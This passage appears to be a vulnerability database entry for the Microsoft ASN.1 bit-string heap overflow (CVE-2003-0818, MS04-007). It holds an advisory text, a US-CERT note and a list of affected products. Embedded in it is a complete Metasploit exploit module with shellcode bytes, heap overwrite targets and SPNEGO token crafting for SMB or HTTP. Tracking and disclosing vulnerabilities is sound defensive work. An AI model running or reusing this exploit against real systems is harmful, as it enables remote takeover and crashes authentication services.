var-200403-0051
Vulnerability from variot
Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. Microsoft Windows ASN.1 Library (msasn1.dll) Has a vulnerability related to integer overflow. For the vulnerability, arbitrary code may be executed remotely.A third party from a distance SYSTEM May execute arbitrary code with privileges. As a result, it is possible to gain administrative privileges on vulnerable systems. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. The issue manifests when the affected function attempts to process a constructed bit string that contain another nested constructed bit string. This vulnerability is exposed in a number of security related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled and NTLMv2 authentication (via TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Client applications, which use the library, will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL). The vulnerable library is used frequently in components that handle certificates such as Internet Explorer and Outlook. Handling of signed ActiveX components could also present an exposure. It should be noted that because ASN.1 data will likely be encoded, for example Kerberos, SSL, IPSec or Base64 encoded, the malicious integer values may be obfuscated and as a result not easily detectable. Issues related to this vulnerability were originally covered in BID 9626 and 9743, further information has been made available which identifies that this is a distinct vulnerability in the library and so this specific issue has been assigned an individual BID. ** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available. This issue is related to insufficient checking of data supplied via an externally supplied length field in ASN.1 BER encoded data. This could result in an excessive value being used in a heap allocation routine, allowing for large amounts of heap memory to be corrupted. This could be leveraged to corrupt sensitive values in memory, resulting in execution of arbitrary code. Exploitation of this issue will result in the corruption of heap based management structures, and may ultimately be leveraged by an attacker to have arbitrary code executed in the context of the affected process. ##
$Id$
This file is part of the Metasploit Framework and may be subject to
redistribution and commercial restrictions. Please see the Metasploit
Framework web site for more information on licensing and terms of use.
http://metasploit.com/framework/
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft ASN.1 Library Bitstring Heap Overflow',
'Description' => %q{
This is an exploit for a previously undisclosed
vulnerability in the bit string decoding code in the
Microsoft ASN.1 library. Both vulnerabilities were fixed in the
MS04-007 patch.
You are only allowed one attempt with this vulnerability. If
the payload fails to execute, the LSASS system service will
crash and the target system will automatically reboot itself
in 60 seconds. If the payload succeeeds, the system will no
longer be able to process authentication requests, denying
all attempts to login through SMB or at the console. A
reboot is required to restore proper functioning of an
exploited system.
This exploit has been successfully tested with the win32/*/reverse_tcp
payloads, however a few problems were encounted when using the
equivalent bind payloads. Your mileage may vary.
},
'Author' => [ 'Solar Eclipse <solareclipse@phreedom.org>' ],
'License' => GPL_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2003-0818'],
[ 'OSVDB', '3902' ],
[ 'BID', '9633'],
[ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'],
[ 'MSB', 'MS04-007'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)
{
'Platform' => 'win',
},
],
],
'DisclosureDate' => 'Feb 10 2004',
'DefaultTarget' => 0))
register_options(
[
OptString.new('PROTO', [ true, "Which protocol to use: http or smb", 'smb']),
], self.class)
end
# This exploit is too destructive to use during automated exploitation.
# Better Windows-based exploits exist at this time (Sep 2006)
def autofilter
false
end
# This is a straight port of Solar Eclipse's "kill-bill" exploit, published
# as a Metasploit Framework module with his permission. This module is only
# licensed under GPLv2, keep this in mind if you embed the Framework into
# a non-GPL application. -hdm[at]metasploit.com
def exploit
# The first stage shellcode fixes the PEB pointer and cleans the heap
stage0 =
"\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
"\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
"\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
"\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
"\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
"\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
"\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
"\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
"\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
"\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
"\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
"\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
"\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
"\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
"\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
"\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
"\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
"\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
"\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
"\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
"\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
"\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
"\x08\x00\xeb\xfe"
token = spnego_token(stage0, payload.encoded)
case datastore['PROTO']
when 'smb'
exploit_smb(token)
when 'http'
exploit_http(token)
else
print_status("Invalid application protocol specified, use smb or http")
end
end
def exploit_smb(token)
connect
client = Rex::Proto::SMB::Client.new(sock)
begin
client.session_request(smb_hostname()) if not datastore['SMBDirect']
client.negotiate
client.session_setup_ntlmv2_blob(token)
rescue => e
if (e.to_s =~ /error code 0x00050001/)
print_status("The target system has already been exploited")
else
print_status("Error: #{e}")
end
end
handler
disconnect
end
def exploit_http(token)
connect
req = "GET / HTTP/1.0\r\n"
req << "Host: #{ datastore['RHOST']}\r\n"
req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"
sock.put(req)
res = sock.get_once
if (res and res =~ /0x80090301/)
print_status("This server does not support the Negotiate protocol or has already been exploited")
end
if (res and res =~ /0x80090304/)
print_status("This server responded with error code 0x80090304 (wth?)")
end
handler
disconnect
end
# Returns an ASN.1 encoded string
def enc_asn1(str)
Rex::Proto::SMB::Utils::asn1encode(str)
end
# Returns an ASN.1 encoded bit string with 0 unused bits
def enc_bits(str)
"\x03" + enc_asn1("\x00" + str)
end
# Returns a BER encoded constructed bit string
def enc_constr(*str_arr)
"\x23" + enc_asn1(str_arr.join(''))
end
# Returns a BER encoded SPNEGO token
def spnego_token(stage0, stage1)
if !(stage0 and stage1)
print_status("Invalid parameters passed to spnego_token")
return
end
if (stage0.length > 1032)
print_status("The stage 0 shellcode is longer than 1032 bytes")
return
end
tag = "\x90\x42\x90\x42\x90\x42\x90\x42"
if ((tag.length + stage1.length) > 1033)
print_status("The stage 1 shellcode is too long")
return
end
# The first two overwrites must succeed, so we write to an unused location
# in the PEB block. We don't care about the values, because after this the
# doubly linked list of free blocks is corrupted and we get to the second
# overwrite which is more useful.
fw = "\xf8\x0f\x01\x00" # 0x00010ff8
bk = "\xf8\x0f\x01"
# The second overwrite writes the address of our shellcode into the
# FastPebLockRoutine pointer in the PEB
peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB
bitstring = enc_constr(
enc_bits("A" * 1024),
"\x03\x00",
enc_constr(
enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))),
enc_constr( enc_bits(fw + bk) ),
enc_constr(
enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))),
enc_constr(
enc_bits("\xeb\x06" + make_nops(6)),
enc_bits("D" * 1040)
)
)
)
)
token = "\x60" + enc_asn1( # Application Constructed Object
"\x06\x06\x2b\x06\x01\x05\x05\x02" + # SPNEGO OID
"\xa0" + enc_asn1( # NegTokenInit (0xa0)
"\x30" + enc_asn1(
"\xa1" + enc_asn1(
bitstring
)
)
)
)
return token
end
end . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Multiple Vulnerabilities in Microsoft ASN.1 Library
Original issue date: February 10, 2004 Last revised: -- Source: US-CERT
A complete revision history is at the end of this document. According to information from eEye Digital Security, the vulnerabilities involve integer overflows and other flaws in integer arithmetic.
Any application that loads the ASN.1 library could serve as an attack vector. In particular, ASN.1 is used by a number of cryptographic and authentication services such as digital certificates (x.509), Kerberos, NTLMv2, SSL,and TLS. Both client and server systems are affected. The Local Security Authority Subsystem (lsass.exe) and a component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1 library.
Solution
Apply a patch
Apply the appropriate patch as specified by Microsoft Security Bulletin MS04-007.
Vendor Information
This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments.
Microsoft
Please see Microsoft Security Bulletin MS04-007.
References
* Vulnerability Note VU#216324 -
<http://www.kb.cert.org/vuls/id/216324>
* Vulnerability Note VU#583108 -
<http://www.kb.cert.org/vuls/id/583108>
* eEye Digital Security Advisory AD20040210 -
<http://www.eeye.com/html/Research/Advisories/AD20040210.html>
* eEye Digital Security Advisory AD20040210-2 -
<http://www.eeye.com/html/Research/Advisories/AD20040210-2.html>
* Microsoft Security Bulletin MS04-007 -
<http://microsoft.com/technet/security/bulletin/MS04-007.asp>
* Microsoft Knowledge Base Article 252648 -
<http://support.microsoft.com/default.aspx?scid=252648>
_________________________________________________________________
These vulnerabilities were researched and reported by eEye Digital Security. Information from eEye and Microsoft was used in this document. ___________
Feedback can be directed to the author, Art Manion.
Copyright 2004 Carnegie Mellon University.
Revision History
February 10, 2004: Initial release
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQFAKVrdXlvNRxAkFWARAuOvAJwL2gJJPBRdrtZ0Le4yyLQLu7CHewCgvaCW 5hU8LQ/oOC4sI8PpnkppCyg= =Oe/N -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200403-0051",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "microsoft",
"version": null
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "r2"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "*"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "standard"
},
{
"model": "windows xp",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "*"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "web"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "enterprise"
},
{
"model": "windows nt",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows 2003 server",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "enterprise_64-bit"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6.0.1358"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6.0.1356"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6.0.1355"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6.0.1351"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6.0.1347"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "yahoo",
"version": "5.6"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.9,
"vendor": "vandyke",
"version": "4.0.5"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.9,
"vendor": "vandyke",
"version": "4.0.4"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.9,
"vendor": "vandyke",
"version": "4.0.3"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.9,
"vendor": "vandyke",
"version": "4.0.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.9,
"vendor": "vandyke",
"version": "4.0.1"
},
{
"model": "windows xp professional sp1",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp professional",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp home sp1",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp home",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp 64-bit edition version sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows xp 64-bit edition version",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows xp 64-bit edition sp1",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows xp 64-bit edition",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows server web edition",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server standard edition",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server enterprise edition itanium",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "20030"
},
{
"model": "windows server enterprise edition",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows server datacenter edition itanium",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "20030"
},
{
"model": "windows server datacenter edition",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2003"
},
{
"model": "windows nt workstation sp6a",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp6",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp5",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt workstation",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp6",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp5",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt terminal server",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp6a",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp6",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp5",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows nt server",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "4.0"
},
{
"model": "windows 98se",
"scope": null,
"trust": 0.9,
"vendor": "microsoft",
"version": null
},
{
"model": "windows",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "98"
},
{
"model": "windows server sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows server",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows professional",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server sp4",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server sp3",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server sp2",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server sp1",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "windows advanced server",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "2000"
},
{
"model": "quicken",
"scope": "eq",
"trust": 0.9,
"vendor": "intuit",
"version": "2003"
},
{
"model": "instant messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "aol",
"version": "5.2.3292"
},
{
"model": "instant messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "aol",
"version": "5.1.3036"
},
{
"model": "instant messenger",
"scope": "eq",
"trust": 0.9,
"vendor": "aol",
"version": "5.0.2938"
},
{
"model": "windows 2000",
"scope": null,
"trust": 0.8,
"vendor": "microsoft",
"version": null
},
{
"model": "windows nt",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "4.0 (server)"
},
{
"model": "windows nt",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "4.0 (terminal_srv)"
},
{
"model": "windows nt",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "4.0 (workstation)"
},
{
"model": "windows server 2003",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "none"
},
{
"model": "windows server 2003",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "(x64)"
},
{
"model": "windows xp",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "(x64)"
},
{
"model": "windows xp",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "sp3"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.6,
"vendor": "yahoo",
"version": "5.5.1249"
},
{
"model": "messenger",
"scope": "eq",
"trust": 0.6,
"vendor": "yahoo",
"version": "5.5"
},
{
"model": "jukebox",
"scope": "eq",
"trust": 0.6,
"vendor": "musicmatch",
"version": "8.2"
},
{
"model": "jukebox",
"scope": "eq",
"trust": 0.6,
"vendor": "musicmatch",
"version": "8.1"
},
{
"model": "jukebox",
"scope": "eq",
"trust": 0.6,
"vendor": "musicmatch",
"version": "8.0"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "8.10"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "8.01"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "8.00"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "7.04"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "7.02"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "7.01"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "7.0"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "6.02"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "6.01"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "6.0"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "5.03"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "5.01"
},
{
"model": "software paintshop pro",
"scope": "eq",
"trust": 0.6,
"vendor": "jasc",
"version": "5.0"
},
{
"model": "turbotax",
"scope": "eq",
"trust": 0.6,
"vendor": "intuit",
"version": "2003"
},
{
"model": "instant messenger beta",
"scope": "eq",
"trust": 0.6,
"vendor": "aol",
"version": "5.5.3415"
},
{
"model": "xmlspy professional edition r2",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "xmlspy professional edition",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "xmlspy home edition r2",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "xmlspy home edition",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "xmlspy enterprise edition r2",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "xmlspy enterprise edition",
"scope": "eq",
"trust": 0.6,
"vendor": "altova",
"version": "2004"
},
{
"model": "acrobat",
"scope": "eq",
"trust": 0.6,
"vendor": "adobe",
"version": "6.0"
},
{
"model": "acrobat",
"scope": "eq",
"trust": 0.6,
"vendor": "adobe",
"version": "5.0.5"
},
{
"model": "acrobat",
"scope": "eq",
"trust": 0.6,
"vendor": "adobe",
"version": "5.0"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "sp1"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "sp3"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "professional"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "server"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "advanced_server"
},
{
"model": "windows 2000",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "sp2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.8"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.7"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.6"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.5"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.4"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.3"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4.1"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.4"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.3.4"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.3.3"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.3.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.3.1"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.3"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.2.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.2.1"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.1.2"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.1.1"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.1"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "3.0"
},
{
"model": "securecrt",
"scope": "eq",
"trust": 0.3,
"vendor": "vandyke",
"version": "2.4"
},
{
"model": "small business server",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20000"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "iis",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "iis",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.1"
},
{
"model": "iis",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0"
},
{
"model": "exchange server",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
